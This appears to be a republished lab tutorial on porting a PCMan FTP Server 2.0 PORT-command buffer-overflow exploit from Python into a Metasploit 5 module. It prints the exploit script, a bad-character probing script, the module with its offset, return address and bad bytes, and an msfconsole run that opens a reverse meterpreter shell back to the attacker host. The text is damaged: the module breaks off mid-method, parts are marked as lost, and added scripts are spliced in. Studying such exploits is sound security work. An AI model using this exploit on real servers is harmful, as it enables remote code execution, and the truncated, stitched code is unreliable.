
How to understand the Migration and Verification of Test Modules in Metasploit 5

2025-03-31 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

How do you port an exploit module into Metasploit 5 and verify that it works? Many newcomers are unsure where to start, so this article summarises the problems that come up during the process and their solutions, using a worked example.

Preface

If an exploit module already exists for a program, there is no need to write a new module with the same function. However, not all exploit modules are developed on the Metasploit framework; many are written in Perl, Python or C/C++, and these cannot be used in Metasploit directly. In that case the existing module has to be ported into one compatible with the Metasploit framework. A successfully ported module not only reproduces the function of the original, it can also use the rich and powerful tools the framework provides for routine tasks, and the payload can be switched dynamically so that the module fits more scenarios.

Experimental environment

1. Attacking host: Kali-Linux-2019.1-vm-amd64
2. Target host: Windows XP SP3 Simplified Chinese
3. Software version: PCMan's FTP Server 2.0

Tools involved

1. Python-2.7.15
2. ImmunityDebugger 1.85

Analysis of the exploit module

This article uses PCMan's FTP Server as the example and describes the porting and testing of an exploit module in detail. The software was developed by National Yangming University in Taiwan Province of China. It is a small, lightweight and easy-to-use FTP server that I like: an FTP server can be set up with it within five minutes. PCMan's FTP Server has a buffer overflow vulnerability for which an off-the-shelf exploit module exists.

1. The full code of the existing exploit module is as follows:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
# Author: Pablo Gonzalez
# Date: 4/11 [rest of the date garbled in extraction]
# Software: PCMan 2.31
# Tested on: Windows XP Profesional SP3 Spanish x86
import socket

print "Creating malicious input!"

junk = '\x41' * 2007          # filler up to the saved return address
ret  = "\xf7\x56\x3c\x7e"     # JMP ESP in User32.dll, 7E3C56F7 (Spanish XP SP3)
nops = '\x90' * 20            # NOP sled in front of the shellcode
# msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
# put shellcode in variable 'sc'
sc = ""  # [shellcode bytes omitted: the payload hex in the original was garbled beyond recovery in extraction]

buffer = junk + ret + nops + sc

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = raw_input('Give me Remote IP Address:')
s.connect((ip, 21))
banner = s.recv(1024)
print banner
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS\r\n')
s.recv(1024)
# Sending input PORT command (Exploitation is coming)
s.send('PORT ' + buffer + '\r\n')
s.close()

2. Key information collection

3. For the method and steps used to determine the offset, see the article "Writing and testing of exploit modules for the buffer overflow vulnerability CVE-2019-9766"; it is not covered in detail here.

4. The existing module's JMP ESP address, 7E3C56F7 in User32.dll, was taken from Windows XP Professional SP3 Spanish x86 and obviously does not apply to the Simplified Chinese XP used here. So we run the command !mona jmp -r esp in ImmunityDebugger to find a suitable jump instruction; mona saves its results in the file jmp.txt. Here we choose

C:\ WINDOWS\ system32\ USER32.dll

The corresponding address is 0x77d29353, and the query result is shown below:

5. Bad characters in the shellcode can be found with the mona plug-in in ImmunityDebugger. Here we use a first-principles method instead: the process is a bit tedious, but it is highly accurate. The test code is as follows (the variable shellcode is assigned every possible byte value):

# Exploit Title: PCMan FTP Server 2.0 PORT Command Exploit
# Author: Neroqi
# Date: 5/14/2019
# Software: PCMan 2.0
# Tested on: Windows XP Profesional SP3 Simplified Chinese
import socket

junk = '\x41' * 2007   # filler up to the saved return address (Offset = 2007)
ret  = '\x42' * 4      # placeholder for the return address; USER32.dll 0x77d29353 in the final module
nops = '\x90' * 20     # NOP sled
# every possible byte value, so the debugger shows where the input is cut off or altered
# (the original listed the 256 escaped bytes by hand; written here as a loop)
shellcode = ''.join(chr(i) for i in range(256))

buffer = junk + ret + nops + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = raw_input('Input FTP Server IP Address:')
s.connect((ip, 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS\r\n')
s.recv(1024)
# Sending input PORT command (Exploitation is coming)
s.send('PORT ' + buffer + '\r\n')
s.close()

5.1 Run the above code in Kali Linux and enter the IP address of PCMan's FTP Server; this sends every possible byte value to the server. ImmunityDebugger then shows the following (only an excerpt is given here, since the full dump is long):

0012C7D4  41414141  AAAA
0012C7D8  42424242  BBBB
0012C7DC  90909090
0012C7E0  90909090
0012C7E4  90909090
0012C7E8  90909090
0012C7EC  90909090
0012C7F0  00000A0D  ....
0012C7F4  0000000A  ....
0012C7F8  00000000  ....
0012C7FC  00000000  ....
0012C800  00000000  ....
0012C804  00000000  ....
0012C808  00000000  ....
0012C80C  00000000  ....
0012C810  00000000  ....
0012C814  00000066  f...
0012C818  77EF6BF2  GDI32.77EF6BF2

None of the shellcode appears in the results above. The \x0D\x0A that follows the twenty NOP instructions ('\x90') is the '\r\n' line ending, not part of the shellcode, so '\x00' is judged to be a bad character.

5.2 Remove '\x00' from shellcode and repeat the operation in 5.1; ImmunityDebugger then shows the following:

0012C7D4  41414141  AAAA
0012C7D8  42424242  BBBB
0012C7DC  90909090
0012C7E0  90909090
0012C7E4  90909090
0012C7E8  90909090
0012C7EC  90909090
0012C7F0  04030201
0012C7F4  08070605
0012C7F8  000A0D09  ....
0012C7FC  00000000  ....
0012C800  00000000  ....
0012C804  00000000  ....
0012C808  00000002  ...
0012C80C  00000000  ....
0012C810  00000000  ....
0012C814  000000AC  ?..
0012C818  77EF6BF2  GDI32.77EF6BF2

The results show that everything in the shellcode after '\x09' is lost, so '\x0a' is judged to be a bad character. Repeating steps 5.1 and 5.2 establishes that the full set of bad characters is '\x00\x0a\x0d'.
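The comparison done by eye in steps 5.1 and 5.2 can be automated. The following Python 3 script is an added example, not code from the original article: it parses ImmunityDebugger stack-dump lines (the two dumps above, transcribed here as constructed samples) into the bytes that actually landed after the NOP sled and reports the first sent byte that was dropped or altered. The stack address 0012C7F0 comes from the article; the function names are my own.

```python
import re

# One ImmunityDebugger stack-dump line as excerpted in steps 5.1 and 5.2: "<address> <dword> ..."
DUMP_RE = re.compile(r"^([0-9A-F]{8})\s+([0-9A-F]{8})", re.IGNORECASE)

def parse_dump(dump, start_addr):
    """Return the bytes stored from start_addr onwards (each dword is little-endian)."""
    data = bytearray()
    for line in dump.splitlines():
        m = DUMP_RE.match(line.strip())
        if m and int(m.group(1), 16) >= start_addr:
            data += int(m.group(2), 16).to_bytes(4, "little")
    return bytes(data)

def first_bad_char(sent, landed):
    """Return the first byte of `sent` that did not survive on the stack, or None."""
    for i, b in enumerate(sent):
        if i >= len(landed) or landed[i] != b:
            return b
    return None

def analyse(dump, sent, shellcode_addr=0x0012C7F0):
    """shellcode_addr is where the bytes after the 20-byte NOP sled land (0012C7F0 in the article)."""
    return first_bad_char(sent, parse_dump(dump, shellcode_addr))

# Constructed samples transcribed from the two dumps in the article.
DUMP_5_1 = """\
0012C7EC 90909090
0012C7F0 00000A0D
0012C7F4 0000000A
0012C7F8 00000000
"""
DUMP_5_2 = """\
0012C7EC 90909090
0012C7F0 04030201
0012C7F4 08070605
0012C7F8 000A0D09
0012C7FC 00000000
"""
ALL_BYTES = bytes(range(256))        # step 5.1: every byte value
WITHOUT_NUL = bytes(range(1, 256))   # step 5.2: \x00 removed

if __name__ == "__main__":
    for step, dump, sent in (("5.1", DUMP_5_1, ALL_BYTES), ("5.2", DUMP_5_2, WITHOUT_NUL)):
        bad = analyse(dump, sent)
        print("step %s: first bad char = %s" % (step, "none" if bad is None else "\\x%02x" % bad))
```

Each run reports one bad byte; remove it from the sent sequence, capture a new dump and run again until the result is none, which reproduces the iteration that ends with '\x00\x0a\x0d'.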

Porting the exploit module

Having analysed the existing exploit module, we now port it to Metasploit.

1. The first part of the ported exploit module pcman_port.rb is as follows:

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "PCMan's FTP Server PORT Command Stack Buffer Overflow",
      'Description'    => "This module exploits a buffer overflow vulnerability found in the PORT command of the PCMan's FTP Server v2.0",
      'Author'         => 'Neroqi',
      'License'        => MSF_LICENSE,
      'References'     => [['EDB', '40714']],
      'DefaultOptions' => { 'EXITFUNC' => 'process', 'VERBOSE' => true },
      'Payload'        => { 'Space' => 1000, 'BadChars' => "\x00\x0a\x0d" },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP Profesional SP3 Simplified Chinese',
            { 'Ret' => 0x77d29353, 'Offset' => 2007 }]   # C:\WINDOWS\system32\USER32.dll
        ],
      'DisclosureDate' => 'May 14 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(21),
        OptString.new('FTPUSER', [true, 'FTP User', 'anonymous']),
        OptString.new('FTPPASS', [true, 'FTP Password', 'anonymous'])
      ], self.class)
  end

1.1 The statement require 'msf/core' loads the whole Metasploit core library, and include Msf::Exploit::Remote::Ftp mixes in the ftp.rb library used for the FTP operations that follow.

1.2 The initialize method defines the module's metadata and parameters: Name, Description, Author, DefaultOptions and so on. The bad characters are set under Payload; the Offset and the JMP ESP address (Ret) are set under Targets.

1.3 register_options sets the target port with Opt::RPORT and, with OptString.new, the user name and password used to log in to the FTP server.

2. The second part of the ported exploit module pcman_port.rb is as follows:

  def exploit
    c = connect_login
    return unless c

    sploit = rand_text_alpha(target['Offset'])
    [the rest of the exploit method, the end of the module and the start of the msfconsole session were lost in extraction; only the following fragment survives]
192.168.188.137
msf5 exploit(windows/ftp/pcman_port) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/ftp/pcman_port) > set LHOST 192.168.188.136
LHOST => 192.168.188.136
msf5 exploit(windows/ftp/pcman_port) > set LPORT 8888
LPORT => 8888
msf5 exploit(windows/ftp/pcman_port) > exploit

As shown in the figure below, a meterpreter session with the target host has been obtained, which confirms that the module was ported successfully:

Given the powerful functions and rich tool library of Metasploit, whenever you come across a newer or better exploit module it is worth porting it to the framework promptly for later use.
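For the defender's side of the same bug, here is an added example in Python 3 (not code from the original article or from the module): a strict parser for the FTP PORT argument as defined in RFC 959, which flags control-channel lines shaped like the 2007-byte one this module sends. The sample session lines are constructed, and the function names are my own.

```python
import re

# RFC 959: the PORT argument is exactly six decimal numbers h1,h2,h3,h4,p1,p2, each 0-255.
PORT_RE = re.compile(r"^PORT (\d{1,3}(?:,\d{1,3}){5})\r?\n?$", re.IGNORECASE)
MAX_PORT_LINE = 32   # "PORT 255,255,255,255,255,255\r\n" is 30 bytes; anything longer is not a valid request

def parse_port(line):
    """Return (ip, port) for a well-formed PORT line, or None if it is malformed."""
    if len(line) > MAX_PORT_LINE:
        return None
    m = PORT_RE.match(line)
    if not m:
        return None
    fields = [int(x) for x in m.group(1).split(",")]
    if any(f > 255 for f in fields):
        return None
    h1, h2, h3, h4, p1, p2 = fields
    return ("%d.%d.%d.%d" % (h1, h2, h3, h4), (p1 << 8) | p2)

def scan_control_channel(lines):
    """Yield (line_no, reason) for every PORT line a proxy, IDS rule or log review should flag."""
    for n, line in enumerate(lines, 1):
        if not line.upper().startswith("PORT"):
            continue
        if parse_port(line) is None:
            yield n, "malformed PORT argument, %d bytes" % len(line)

# Constructed sample session: a normal active-mode PORT, then one shaped like the
# article's buffer (Offset = 2007 bytes of filler before the return address).
SAMPLE = [
    "USER anonymous\r\n",
    "PASS anonymous\r\n",
    "PORT 192,168,188,136,31,144\r\n",
    "PORT " + "A" * 2007 + "\r\n",
]

if __name__ == "__main__":
    for n, reason in scan_control_channel(SAMPLE):
        print("line %d: %s" % (n, reason))
```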
